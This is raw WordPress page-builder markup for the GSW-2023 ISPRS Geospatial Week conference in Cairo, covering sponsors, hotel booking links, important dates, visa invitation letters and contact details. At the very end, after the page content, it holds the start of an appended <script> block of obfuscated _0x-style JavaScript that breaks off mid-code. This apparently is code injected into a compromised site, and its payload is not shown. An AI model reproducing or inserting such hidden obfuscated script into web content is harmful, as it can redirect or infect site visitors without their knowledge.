width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687391337354{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553031880{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #ffff00; padding: 5px; background-color: rgba(255,255,255, 0.5);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #ffff00; font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #ffff00;\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 